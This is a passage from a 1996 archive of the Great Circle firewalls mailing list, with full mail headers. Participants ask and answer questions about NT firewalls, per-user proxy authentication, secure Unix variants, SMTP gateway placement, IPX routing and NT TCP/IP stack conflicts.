Technology Garrison Associates jeromie@garrison.com From firewalls-owner Wed Feb 7 06:09:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA08886 for firewalls-outgoing; Wed, 7 Feb 1996 06:07:08 -0800 (PST) Received: from server. ([198.199.198.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA08881 for ; Wed, 7 Feb 1996 06:07:04 -0800 (PST) Received: from DMT.fc.com ([198.199.198.164]) by server. (8.6.12/8.6.12) with SMTP id KAA02865 for ; Wed, 7 Feb 1996 10:39:03 -0500 Message-ID: <3118B1D7.7C54@fc.com> Date: Wed, 07 Feb 1996 09:06:15 -0500 From: "Douglas M. Todd, Jr." Organization: fc.com X-Mailer: Mozilla 2.0GoldB1 (Win95; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: NT Firewalls/Web Servers Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone know of any good NT Firewalls and Web Servers? ==DMT> -- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >Douglas M. Todd, Jr. fc.com, Inc. One Federal Street BLD 102 Springfield, MA 01105 PHN: 413-733-7333 FAX: 413-733-7725 Email: Doug@fc.com or Bunyan@msn.com From firewalls-owner Wed Feb 7 06:54:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA09757 for firewalls-outgoing; Wed, 7 Feb 1996 06:44:53 -0800 (PST) Received: from protosoft.com ([204.128.207.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA09744 for ; Wed, 7 Feb 1996 06:44:48 -0800 (PST) Received: by protosoft.com (4.1/SMI-4.1) id AA14974; Wed, 7 Feb 96 08:42:45 CST Date: Wed, 7 Feb 1996 08:42:45 -0600 (CST) From: Mohammed Ali To: Matts Kallioniemi Cc: Sick Puppy , firewalls@GreatCircle.COM Subject: Re: Need a few pointers In-Reply-To: <199602061550.QAA17949@mail.pi.se> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 6 Feb 1996, Matts Kallioniemi wrote: > At 17.41 1996-02-05 -0500, Sick Puppy wrote: > >There was a very good response to my query. I had no idea there were > >so many security problems and performance problems associated with > >WindBlows 95. Sounds like the operating system was written by a couple > >of drunken cats. In a couple of days I will get the responses together > >in one file, together with a couple of good web pointers, and pass it on > >to anyone who wants an e-mailed copy. > > I want one, please! Why don't you post it to the list? I also want a copy, please mail it to the list. Mohammed Ali. From firewalls-owner Wed Feb 7 07:38:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA10595 for firewalls-outgoing; Wed, 7 Feb 1996 07:12:01 -0800 (PST) Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA10590 for ; Wed, 7 Feb 1996 07:11:56 -0800 (PST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id JAA23576 for ; Wed, 7 Feb 1996 09:11:22 -0600 (CST) Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.7.2/8.7.2) with SMTP id JAA23572 for ; Wed, 7 Feb 1996 09:11:21 -0600 (CST) Received: from zuhn.sctc.com (zuhn.sctc.com [172.17.1.134]) by spirit.sctc.com (8.6.12/8.6.9) with SMTP id JAA10390; Wed, 7 Feb 1996 09:11:52 -0600 Message-Id: <199602071511.JAA10390@spirit.sctc.com> Date: Wed, 07 Feb 1996 09:11:48 -0600 From: zuhn@sctc.com (david d `zoo' zuhn) To: firewalls@greatcircle.com Subject: Re: User level firewall / proxy authentication References: <3117F7B3.3647@mecx05.colesmyer.com.au> Organization: Secure Computing Corporation; Roseville, MN Sender: firewalls-owner@GreatCircle.COM Precedence: bulk // > Are there any firewall or proxy server products available that will allow // > outgoing user authentication based upon a user id, rather than an IP // > address? // > // > Our users are mobile and this makes it difficult to restrict internet // > access on a per user basis, since their source IP address is likely to // > change. // // This sounds pretty unsafe! How do you prevent me from spoofing one of // your users? Yes, there are several firewall systems that handle authentication on a per-user basis. All that I know of will also allow permission acl's that include host address ranges as well. This can be useful when dealing with a range of dynamic addresses (such as allocated by DHCP or similar protocols), requiring userid based authentication for those addresses, and relying on host-based permissions for the static addresses on the network. As for the safety, there are usually a variety of means available for user authentication. Those I have seen in the market range from insecure username & reusable passwords (a la Unix passwords) to software based challenge-response systems (LOCKout or S/Key) to hardware based token cards of some form or another (SecurID, SNK). A common tradeoff in authentication systems is price vs. unspoofability. For many sites, outbound authentication is used more for accounting chargeback schemes than for any more stringent authorization, so a reusable password system isn't unreasonable. But I'd never trust inbound authentication to anything that doesn't use some form of cryptographically secure algorithm. -- david d `zoo' zuhn --- secure computing corporation zuhn@sctc.com From firewalls-owner Wed Feb 7 07:53:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA10951 for firewalls-outgoing; Wed, 7 Feb 1996 07:27:19 -0800 (PST) Received: from gatekeeper.vitro.com (gatekeeper.vitro.com [149.32.254.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA10944 for ; Wed, 7 Feb 1996 07:27:10 -0800 (PST) From: don_tompkins@esd.tracor.com Received: by gatekeeper.vitro.com (5.65/DEC-Ultrix/4.3) id AA12018; Wed, 7 Feb 1996 10:25:45 -0500 Received: from esd.vitro.com(131.189.79.30) by gatekeeper.vitro.com via smap (V1.3) id sma012004; Wed Feb 7 10:25:37 1996 Received: from ccMail by esd.tracor.com (IMA Internet Exchange 1.04b) id 118c4360; Wed, 7 Feb 96 10:24:38 -0500 Mime-Version: 1.0 Date: Wed, 7 Feb 1996 08:38:44 -0500 Message-Id: <118c4360@esd.tracor.com> Subject: Most Secure Unix? To: giff@congress.east.sun.com (Wayne Gifford - Internet Commerce Group), Firewalls@GreatCircle.COM Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What about HP-UX BLS. Other B level efforts are also underway... Concur administration is important. From firewalls-owner Wed Feb 7 08:09:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA11413 for firewalls-outgoing; Wed, 7 Feb 1996 07:46:47 -0800 (PST) Received: from usia.gov (XGATE.USIA.GOV [198.67.64.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA11407 for ; Wed, 7 Feb 1996 07:46:39 -0800 (PST) Received: from NetWare MHS (SMF70) by usia.gov via Connect2-SMTP 4.00; Wed, 7 Feb 96 10:46:18 -0500 Message-ID: <80C818310136C8D1@usia.gov> Date: Wed, 7 Feb 96 10:42:40 -0500 From: "Lehrer, Neil" Organization: USIA To: firewalls@greatcircle.com Subject: firewalls, email, and dns X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway Sender: firewalls-owner@GreatCircle.COM Precedence: bulk hi, our smtp mail server is an smtp/mhs gateway that runs on DOS. since it does not have the traditional sendmail vulnerabilities can I/should I allow smtp traffic through a firewall to it rather than having a mail forwarder outside the firewall receive the mail and send it to the gateway? yes/no? and if yes, are there any other considerations, for example, how should i set up the internal and external dns's? cc to my email would be great. thanks. Regards +++++++++++++++++++++++++++++++++++++++ + Neil Lehrer + U.S. Information Agency + Networks and Systems Support Division + + voice 202 619-0903 + fax 202 619-3883 + internet nlehrer@usia.gov + + "oh what a tangled net we weave + when we seek to retrieve." + +++++++++++++++++++++++++++++++++++++++ From firewalls-owner Wed Feb 7 08:40:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA12742 for firewalls-outgoing; Wed, 7 Feb 1996 08:18:11 -0800 (PST) Received: from netsurfer.pixi.com (netsurfer.pixi.com [140.174.243.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA12737 for ; Wed, 7 Feb 1996 08:18:06 -0800 (PST) Received: from netsurfer by netsurfer.pixi.com ; 7 FEB 96 06:12:59 Date: Wed, 7 Feb 1996 06:12:58 -1000 (HST) From: NetSurfer X-Sender: netsurf@netsurfer To: SATEESHB Cc: firewalls@greatcircle.com, Jeromie Jackson , winnt-l@eva.dc.lsoft.com Subject: Re: NT's TCP/IP stack + NetManage NEWT conflict. In-Reply-To: <9601078236.AA823691133@smtp_gw.inf.com> Message-ID: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Are you running the Windows Chameleon or the NT Chameleon? On -1 xxx -1, SATEESHB wrote: > I faced problems with NetManage Chameleon version 5.0 .It starts a > program called NEWT(NetManage Enhanced Windows Tcp/IP). 8< snip 8< snip #include _ __ __ _____ ____ / | / /__ / /_/ ___/__ _______/ __/__ _____ / |/ / _ \/ __/\__ \/ / / / ___/ /_/ _ \/ ___/ / /| / __/ /_ ___/ / /_/ / / / __/ __/ / ================/_/=|_/\___/\__//____/\__,_/_/==/_/==\___/_/=============== From firewalls-owner Wed Feb 7 08:53:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA12226 for firewalls-outgoing; Wed, 7 Feb 1996 08:07:19 -0800 (PST) Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA12221 for ; Wed, 7 Feb 1996 08:07:13 -0800 (PST) Received: by Disclosure.COM (4.1/SMI-4.1) id AA19254; Wed, 7 Feb 96 11:09:47 EST Date: Wed, 7 Feb 1996 11:09:46 -0500 (EST) From: Scott Barman To: Wayne Gifford - Internet Commerce Group Cc: Firewalls@GreatCircle.COM Subject: Re: Most Secure Unix? In-Reply-To: <199601292147.QAA06214@traveller.East.Sun.COM> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 29 Jan 1996, Wayne Gifford - Internet Commerce Group wrote: > > There are no secure UNIXes, only security concious administrators Geez... we're back on this again? How about: There are no secure OPERATING SYSTEMS, only security conscience administrators/sysops/people who give a darn. Is that OK and politically correct? I sure hope so! scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." - scott barman From firewalls-owner Wed Feb 7 08:55:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA12760 for firewalls-outgoing; Wed, 7 Feb 1996 08:18:23 -0800 (PST) Received: from tuna.wang.com (tuna.wang.com [150.124.136.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA12746 for ; Wed, 7 Feb 1996 08:18:16 -0800 (PST) Received: from mail.wangfed.com (ns.wangfed.com [159.94.10.19]) by tuna.wang.com (8.6.12/8.6.12tf1) with SMTP id LAA26781 for ; Wed, 7 Feb 1996 11:17:27 -0500 Received: from [159.94.10.15] by mail.wangfed.com (1.37.109.4/A.09.00a) id AA29082; Wed, 7 Feb 96 11:08:26 -0600 Received: from [159.94.14.48] by hfsi (BULL 5.61++/B.O.S 02.01) id AA10205; Wed, 7 Feb 96 11:05:02 -0500 Date: Wed, 7 Feb 96 11:05:02 -0500 Message-Id: <9602071605.AA10205@hfsi> From: "KM" Reply-To: "KM" To: firewalls@GreatCircle.COM Subject: Re: Survey Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message <199602061540.KAA18136@Fe3.rust.net> "Kenneth J. Stephens" writes: > If the magazine publishers forced the issue date onto all of their reprints > the vendors would have little use for the reprints. The date stamp would > obsolete > the reprint so quickly that the vendor would look foolish for distributing > old info. One of the hazards of a dynamic industry. So what you're saying is that the publishers, in collusion with the vendors, are being dishonest by omission. Why doesn't this suprise me? ------------------------------------------------------ Karen Goertzel Manager, International Programmes and Special Projects Secure Systems and Services Operation Wang Federal, Inc. 7900 Westpark Drive - MS 700 McLean, Virginia 22102-4299 TEL: 703-827 3914 FAX: 703-827 3161 goertzek@wangfed.com http://www.wangfed.com +------------------------------+ | It infuriates me to be wrong | | when I know I'm right. | | -- Moliere | +------------------------------+ From firewalls-owner Wed Feb 7 09:09:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA13097 for firewalls-outgoing; Wed, 7 Feb 1996 08:24:18 -0800 (PST) Received: from usia.gov (XGATE.USIA.GOV [198.67.64.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA13087 for ; Wed, 7 Feb 1996 08:24:12 -0800 (PST) Received: from NetWare MHS (SMF70) by usia.gov via Connect2-SMTP 4.00; Wed, 7 Feb 96 11:24:03 -0500 Message-ID: <88C818310136C8D1@usia.gov> In-Reply-To: <0A1F09310136C8D1> Date: Wed, 7 Feb 96 11:19:33 -0500 From: "Lehrer, Neil" Organization: USIA To: firewalls@greatcircle.com Subject: ipx routing X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: Re IPX routing paul.carrol@medaphis.com offered up: >I am about to setup a firewall for our Internet link. > >I have recently learned that we are bringing in an X.25 line from Compuserve. >The line runs into a Compuserve box that resides here that we do NOT control. > >From the Compuserve box, a line runs into one of our router interfaces. > >Obviously, I want to firewall this link as well... >It passes IPX and TCP/IP, and needs to do both. > >The problem I have is with IPX. We have decided on Raptor Eagle as our firewall. >It will run on a SUN Sparc 20, and it will NOT pass IPX. > >Any suggestions? Well .. not sure whether this works or not, but I'd be interested in comments myself. Is IPX critical for you ? I ask because we're running IP and IPX on our LAN here, and I'm being pushed to allow both across our firewalling mechanism. Our Netware guy said to me the other day that we needed IPX as some products actually require IPX in order to work. This sounds like snake oil to me - I'd have thought that the underlying protocol - whether IP or IPX should make no difference whatsoever. Any comments on this ? It's also been suggested to me that Novell/IP works by simply encapsulating IPX within an IP packet - this doesn't quite sound like full IP to me. Can anyone comment upon this ? If we can move everything to IP, then our problems potentially disappear here, and I needn't route IPX at all. Sound easy to me from there (ish!). I wonder Paul, whether you could do something along these lines ? I wonder everyone whether you all think I'm pouring snake oil around the place too ? :) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` it is true that some netware products use ipx/spx directly. whether they would work properly, or at all, with netware/ip is something you would have to test (unfortunately). Regards +++++++++++++++++++++++++++++++++++++++ + Neil Lehrer + U.S. Information Agency + Networks and Systems Support Division + + voice 202 619-0903 + fax 202 619-3883 + internet nlehrer@usia.gov + + "oh what a tangled net we weave + when we seek to retrieve." + +++++++++++++++++++++++++++++++++++++++ From firewalls-owner Wed Feb 7 09:24:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA14114 for firewalls-outgoing; Wed, 7 Feb 1996 08:41:56 -0800 (PST) Received: from server1.startel.com.ar ([200.26.1.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA14083 for ; Wed, 7 Feb 1996 08:41:43 -0800 (PST) Received: from [200.26.8.62] (ts1-ppp15.starnet.net.ar) by server1.startel.com.ar with SMTP id AA18039 (5.67b/IDA-1.4.4 for ); Wed, 7 Feb 1996 13:37:32 +0300 Message-Id: <199602071037.AA18039@server1.startel.com.ar> To: "firewalls@GreatCircle.com" Subject: DNS for NT Date: Thu, 08 Feb 96 13:41:42 -0500 From: Eduardo Torres X-Mailer: E-Mail Connection v2.5.03 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -- [ From: Eduardo Torres * EMC.Ver #2.5.02 ] -- Can anyone recommend a good DNS solution for NT? Thank you, Eduardo -- ------------------------------------------- Eduardo Jose Torres STARTEL S.A. Marketing - Internet Leandro N. Alem 628 2do Piso 1001 Buenos Aires Argentina Tel: 54-1-318-6000 Fax: 54-1-318-6376 ------------------------------------------- From firewalls-owner Wed Feb 7 09:53:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA14283 for firewalls-outgoing; Wed, 7 Feb 1996 08:45:32 -0800 (PST) Received: from wizard.pn.com (wizard.pn.com [204.96.36.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA14261 for ; Wed, 7 Feb 1996 08:45:25 -0800 (PST) Received: from synaxis.com (mail.synaxis.com [204.96.42.66]) by wizard.pn.com (8.6.12) with SMTP id LAA04098 for ; Wed, 7 Feb 1996 11:44:36 -0500 Received: from Synaxis-Message_Server by synaxis.com with Novell_GroupWise; Wed, 07 Feb 1996 11:43:10 -0500 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Wed, 07 Feb 1996 11:19:29 -0500 From: Chris Jenkins To: doug@fc.com, firewalls@GreatCircle.COM Subject: NT Firewalls/Web Servers -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Raptor Systems makes a one of the only firewall products I know of for NT. I will be gettin an eval in to test it out... Chris Jenkins cjenkins@synaxis.com >>> Douglas M. Todd, Jr. 02/07/96 09:06am >>> Does anyone know of any good NT Firewalls and Web Servers? ==DMT> -- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >Douglas M. Todd, Jr. fc.com, Inc. One Federal Street BLD 102 Springfield, MA 01105 PHN: 413-733-7333 FAX: 413-733-7725 Email: Doug@fc.com or Bunyan@msn.com From firewalls-owner Wed Feb 7 09:57:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA13341 for firewalls-outgoing; Wed, 7 Feb 1996 08:28:17 -0800 (PST) Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA13317 for ; Wed, 7 Feb 1996 08:28:08 -0800 (PST) Received: by Disclosure.COM (4.1/SMI-4.1) id AA19351; Wed, 7 Feb 96 11:30:27 EST Date: Wed, 7 Feb 1996 11:30:25 -0500 (EST) From: Scott Barman To: Russ Cc: "'Jeromie Jackson'" , "'Firewalls'" Subject: RE: NT's TCP/IP stack In-Reply-To: <01BAF4F6.E8D957C0@rwcooper.RC.Toronto.on.ca> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 7 Feb 1996, Russ wrote: > [Firewall relevance] > To some extent, there may be some relief to all of this on the horizon. > With the introduction of Raptor and soon Network-1 into the Windows NT > realm of Firewalls, there are seriously security conscious individuals who > will have to track these changes to see if they affect their product. > Hopefully this will lead to increased scrutiny of the product from a > specifically secure standpoint. There are three firewall built on top of NT, not including the vaporware Micro$haft themselves are touting. I have been in contact with someone who has evaluated two of them. Unfortunatly, I cannot say who or give further details (this person will be publishing this information in one of the "major" industry rags), but let's just say that my suspicion has been confirmed: you cannot use these systems for anything faster than a 64Kbps connection. T1, or even fractional T1 (128Kbps), start showing failture. > [Shameless plug] > Of course, with the just announced strategic partnership between MCI and > Microsoft (and of course, SHL), and the fact that MCI will be hosting MSN > on the Internet, we will hopefully see lots more NT boxes on the Internet, > again, forcing people to look more closely at the viability of securing NT > boxes. Maybe Micro$loth is hoping Vint Cerf will help their sagging system. Then again companies are into prostitution for the sake of the bottom line--read "On the Line" regarding this statement and MCI. Hopefully, when folks put NT on the internet, they will find the same thing I found through experimentation: it has multitasking that can't get out of its own way, it can't handle the load of a medium-low environment, and if something goes wrong, there isn't a quick interface to fix things (by passing that maze of twisty little menus all different!). > There's definitely something wrong with someone like me who lives for these > types of questions, I guess I just love the controversy! ;-] Yea, it's called living the hype and beliving the b.s. from marketing machines. No controversy here--especially when I don't believe what I read or hear from know M.$.... err... b.s. artists. scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." - scott barman From firewalls-owner Wed Feb 7 10:01:54 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA14528 for firewalls-outgoing; Wed, 7 Feb 1996 08:52:08 -0800 (PST) Received: from wizard.pn.com (wizard.pn.com [204.96.36.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA14522 for ; Wed, 7 Feb 1996 08:52:00 -0800 (PST) Received: from synaxis.com (mail.synaxis.com [204.96.42.66]) by wizard.pn.com (8.6.12) with SMTP id LAA04470 for ; Wed, 7 Feb 1996 11:51:06 -0500 Received: from Synaxis-Message_Server by synaxis.com with Novell_GroupWise; Wed, 07 Feb 1996 11:49:52 -0500 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Wed, 07 Feb 1996 11:26:12 -0500 From: Chris Jenkins To: winnt-l@eva.dc.lsoft.com, jeromie@garrison.com, firewalls@greatcircle.com, SATEESHB@inf.com Subject: Re: NT's TCP/IP stack + NetManage NEWT conflict. -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk all of the newest (and even WFW311) come with a free TCPIP stack. Third party applications like Chameleon, LanWorkPlace, etc....come with their own stacks. In most cases, you should be able to get applications (Telnet, FTP, mail, etc) from one third-party product to work over anothers TCP/IP stack. This is where the WINSOCK standard comes in. More specialized TCP/IP functions running on Windows (such as XServer, 3270, etc) may require a stack/Winsock specific to that particular product. Since MS gives you TCP/IP and WINSOCK, most third party applications should be able to run. If I recall correctly, I think that some of Chameleons applications will run on MS tcp/ip stack. Anyway......jsut been my experience Chris Jenkins cjenkins@synaxis.com >>> SATEESHB 02/07/96 08:07am >>> well, I don't know how relevant is the reply to your needs. I faced problems with NetManage Chameleon version 5.0 .It starts a program called NEWT(NetManage Enhanced Windows Tcp/IP). When I try to run one of my programs which is a service from service control panel, it hangs.Even that cute messagebox "Attempting to start Service " with the small clock also doesn't come up. After wasting many hours and losing sleep, I found out that if I rename NEWT.exe to some other name so it would fail to get loaded automatically, the SCM behaves properly. I feel, NEWT tcp/ip might be conflicting with NT TCP/IP. Why should NetManage guys have a different program for this when NT provides one is beyond my comprehension. It would be of help to me if some one can tell me how is Service Control Manager is related to TCP/IP here?.(Is it something to do with RPC stuff they talk about for starting services remotely?.In my case I started locally). Any discussion on NT TCP/IP stack will be greatly appreciated. Regards, Sateesh Babu N S, Systems Analyst, Infosys Technologies Ltd, Bangalore India. ______________________________ Reply Separator _________________________________ Subject: NT's TCP/IP stack Author: jeromie@garrison.com (Jeromie Jackson) at SMTP_GW Date: 2/6/96 7:03 PM As we have all seen in the last few weeks, there have been several people who have been ragging on Windows NT TCP/IP stack. I would like to hear some comments on real problems that have been detected. I have looked around the net, although no hard-fact information could I find. NT appears to have some good qualities, ease-of-use, although I am unsure about several things. The integrity of the OS. Nobody can test it well. Who's to say what holes are under the hood that nobody has a good chance to look at. The TCP/IP stack has been said to have problems. They are not a security company, therefore I am very unwilling to assume they have done the proper testing for security purposes. For that matter, I am unwilling to assume the product isn't full of "Microsoft Features" that are undocumented.. I would be very interested in hearing about these issues. Jeromie Jackson Director of Technology Garrison Associates jeromie@garrison.com From firewalls-owner Wed Feb 7 10:06:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA15908 for firewalls-outgoing; Wed, 7 Feb 1996 09:30:30 -0800 (PST) Received: from smtp-gw01.ny.us.ibm.net ([165.87.194.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA15903 for ; Wed, 7 Feb 1996 09:30:26 -0800 (PST) From: pcuser@slip133-140.dc.us.ibm.net Received: (from uucp@localhost) by smtp-gw01.ny.us.ibm.net (8.6.9/8.6.9) id RAA79113 for <@smtp-gw01.ny.us.ibm.net:firewalls@greatcircle.com>; Wed, 7 Feb 1996 17:29:37 GMT Message-Id: <199602071729.RAA79113@smtp-gw01.ny.us.ibm.net> Received: from slip133-140.dc.us.ibm.net(129.37.133.140) by smtp-gw01.ny.us.ibm.net via smap (V1.3mjr) id smaiNwCKs; Wed Feb 7 17:29:26 1996 Date: Tue, 6 Feb 96 10:04:23 PST Subject: Firewalls Product Comparison To: @smtp-gw01.ny.us.ibm.net:firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi guys, I need to prepare a comparative study between Sun´s Firewall 1 and IBM NetSP, for the end of this week. Does anyone Knows where I could find some interesting articles concerning both of these products?? Any help woul be appreciated. Wilmer Caripe EMSCA - ENGINEERING AND MANUFACTURING SYSTEMS CARACAS, VENEZUELA From firewalls-owner Wed Feb 7 10:08:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA15536 for firewalls-outgoing; Wed, 7 Feb 1996 09:20:20 -0800 (PST) Received: from arthur.crpht.lu (arthur.crpht.lu [158.64.4.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA15531 for ; Wed, 7 Feb 1996 09:20:09 -0800 (PST) Received: from cnsmac1.crpht.lu by arthur.crpht.lu with SMTP (1.37.109.4/16.2) id AA15004; Wed, 7 Feb 96 18:18:54 +0100 X-Sender: security@arthur.crpht.lu Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 7 Feb 1996 18:24:43 +0100 To: firewalls-digest@GreatCircle.COM From: security@crpht.lu (Bruno MAMER) Subject: Firewall, yes, but policy first ! Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi everyone, Just a small question, last August, "Jim Carroll" talked of the book "Information Security Policies Made Easy". We've decided to buy it but lack references. Does anyone have the editor, ISBN number ? TIA Bruno _________________________________________________________________________ Bruno MAMER bruno.mamer@crpht.lu Centre de Recherche Public Henri Tudor Computing and Network Services Our local archive on security : http://www.crpht.lu/CNS/html/PubServ/Security/security-home.html ------------------------------------------------------------------------- From firewalls-owner Wed Feb 7 10:38:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA18861 for firewalls-outgoing; Wed, 7 Feb 1996 10:23:46 -0800 (PST) Received: from garrison.com. (garrison.garrison.com [199.1.78.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA18846 for ; Wed, 7 Feb 1996 10:23:38 -0800 (PST) Received: by garrison.com. (4.1/Nutered Mailer) id AA05279; Wed, 7 Feb 96 12:20:27 CST Date: Wed, 7 Feb 96 12:20:27 CST From: jeromie@garrison.com (Jeromie Jackson) Message-Id: <9602071820.AA05279@garrison.com.> To: firewalls@greatcircle.com, zuhn@sctc.com Subject: Re: User level firewall / proxy authentication Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > // > Are there any firewall or proxy server products available that will allow > // > outgoing user authentication based upon a user id, rather than an IP > // > address? > As for the safety, there are usually a variety of means available for user > authentication. Those I have seen in the market range from insecure > username & reusable passwords (a la Unix passwords) to software based > challenge-response systems (LOCKout or S/Key) to hardware based token > cards of some form or another (SecurID, SNK). A common tradeoff in > authentication systems is price vs. unspoofability. The one thing to remember is that when using One-Time Password products is that only the inital login converstation is authenticated. If a user authenticates himself to a machine, and then starts a session he is still vulerable to hijacks, sniffing & spoofing. If you were to use an encryption device such as the Persona card, or the Smartcat product, or Cryptocard, you will have continual authentication & confidentiality. This continual encryption will patch up the above mentioned weaknesses that OTP products do not address. Jeromie Jackson Garrison Technologies jeromie@garrison.com From firewalls-owner Wed Feb 7 11:14:09 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA20417 for firewalls-outgoing; Wed, 7 Feb 1996 10:48:22 -0800 (PST) Received: from netcom.netcom.com (netcom.netcom.com [192.100.81.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA20410 for ; Wed, 7 Feb 1996 10:48:17 -0800 (PST) Received: by netcom.netcom.com (8.6.12/Netcom) id KAA29708; Wed, 7 Feb 1996 10:05:05 -0800 Date: Wed, 7 Feb 1996 10:04:59 -0800 (PST) From: Bob Bosen Subject: Re: User level firewall / proxy authentication To: Graham Jose cc: "firewalls@GreatCircle.COM" In-Reply-To: <3117F7B3.3647@mecx05.colesmyer.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 7 Feb 1996, Graham Jose wrote: > Are there any firewall or proxy server products available that will allow > outgoing user authentication based upon a user id, rather than an IP address? > > Our users are mobile and this makes it difficult to restrict internet access on a > per user basis, since their source IP address is likely to change. > > Thanks, > > Graham > -- > Graham Jose, Technical Analyst, Information Systems Security > Retail Technology Services, Coles Myer Limited (Australia) > Voice: +613 9483 7613 Email: gjose@mecx05.colesmyer.com.au > Most existing firewall products can be supplemented with an interface to some kind of enhanced user authentication. This may use a published protocol such as XTACACS, TACACS+, RADIUS, or (our own) EASSP, or it may use a proprietary protocol. Most of the enhanced user authentication vendors market some kind of authentication server(s) that include (at least) a proprietary API or (hopefully) one or more published APIs and/or support one or more of the aforementioned protocols. You can obtain free authentication protocol server daemons supporting the aforementioned protocols from several of the more popular vendors of routers and commservers and firewalls. When you are thinking about authenticating user identity on the Internet, make sure your implementation is non-replayable. Stealing memorized passwords would be your 